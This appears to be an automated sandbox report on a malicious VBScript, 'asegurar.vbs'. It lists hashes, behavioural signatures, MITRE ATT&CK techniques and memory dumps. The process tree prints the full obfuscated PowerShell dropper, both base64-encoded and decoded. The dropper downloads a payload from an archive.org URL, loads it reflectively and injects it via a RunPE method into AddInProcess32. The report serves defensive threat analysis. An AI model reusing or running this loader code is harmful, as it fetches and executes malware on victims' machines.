dc8376cec72b52f0a7e6ef863740991cad8e2c99d769460e73f0593c4405fce8

General

Target

asegurar.vbs
Size

501KB
MD5

68f1d5edc9ea0eed35df8223763daee8
SHA1

70cace5a37a31722c7e860ce9dd9fad8ea326be1
SHA256

dc8376cec72b52f0a7e6ef863740991cad8e2c99d769460e73f0593c4405fce8
SHA512

e15043efa9e29c7f16aa7d99377df0e33c593275ac8b5783bf2e09b6171ff3c46b0e06a12789e5fc5774bbbc3a5a62885034784a56168cdb599184f1c0e7cb8a
SSDEEP

12288:rPQSbkVemyiwLDY+QwRiGZzASD0EwcLJfbxdghlqtRLaTfhP8lV42Po/DtmUF5Lh:yoXuC9ZOGzM5HB

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2480	powershell.exe
6	2480	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
588	powershell.exe
2480	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
588	powershell.exe
2480	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 588	2124	WScript.exe	31
PID 2124 wrote to memory of 588	2124	WScript.exe	31
PID 2124 wrote to memory of 588	2124	WScript.exe	31
PID 588 wrote to memory of 2480	588	powershell.exe	33
PID 588 wrote to memory of 2480	588	powershell.exe	33
PID 588 wrote to memory of 2480	588	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1059752d6290ef9863b2a87daae544ec

SHA1
625fc7f5012ca5543ab4e8ab8b0b9ac20c5f28b2

SHA256
9374019c1f8aba85e9a5ace3211133901e48fdff1946e439bb46b77882eb098c

SHA512
2bbb31407a081edf2058fecc15890ff182f8e7e390b6d0a9e3dd99440202d387453e5997d6521436eaae0625155121301b74da4589e411a99e109d9a53cce0ea

Download Submit
memory/588-4-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

Filesize
4KB

Download
memory/588-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/588-6-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/588-12-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/588-13-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing